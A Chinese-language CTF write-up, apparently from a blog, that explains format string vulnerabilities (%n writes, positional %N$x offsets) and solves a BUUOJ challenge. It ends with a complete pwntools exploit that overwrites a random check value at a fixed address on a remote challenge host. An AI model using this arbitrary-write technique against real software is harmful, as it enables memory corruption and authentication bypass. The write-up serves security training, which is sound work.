格式化字符串:
https://www.cnblogs.com/0xJDchen/p/5904816.html
%d:读取10进制数值
%x:读取16进制数值
%s:读取字符串值
%n:将当前字符串的长度打印到var中。如
printf(“test %hn”,&var[其中var为两个字节])
printf(“test %n”,&var[其中var为一个字节])
1)得到字符串离esp的距离
输入多个%08x;
%12$x可以直接读取偏移12处的值,省略输入前11个%08x;
2)对任意地址进行任意写
写任意值:%Nx控制字符串长度为N,将N写入
任意地址:%M$n:离esp偏移M的内存中的值 为 被修改的地址
3)使用python将不可见字符串输入到程序中:
python -c "print ‘AAAA %12$x’ " | ./format
4)将int值从低位到高位写入时,可能高位所需的长度小于低位,需要从上一位借1
因为写入时只会写入1个字节,使低位保持正确即可
题目
目标:26行使得nptr字符串的值与unk_804C044相同
漏洞:23行存在格式化字符串漏洞
思路:虽然unk_804C044是从"/dev/urandom"中读取,但可以通过漏洞修改unk_804C044的值,然后25行read时输入相同的值即可。
实验
1)unk_804C044的地址:addr = 0x0804C044
2)printf时esp和buf的偏移:10
也可以通过gdb看,在23行的printf下断点:b *0x080492BC
可知,距离为 0xffffd058 - 0xffffd030 = 40,但是偏移为40/4=10
3)buf为
p32(addr)+p32(addr+1)+p32(addr+2)+p32(addr+3) + ‘%10$n%11$n%12$n%13$n’
写入的值为0x10101010
最终exp为
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
# p = process("./pwn")
p = remote('node3.buuoj.cn', 29611)
addr = 0x0804C044
payload = p32(addr)+p32(addr+1)+p32(addr+2)+p32(addr+3) + '%10$n%11$n%12$n%13$n'
p.recvuntil('your name:')
p.sendline(payload)
p.recvuntil("your passwd:")
p.sendline(str(0x10101010))
p.interactive()
p.close()
扫一扫
107
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
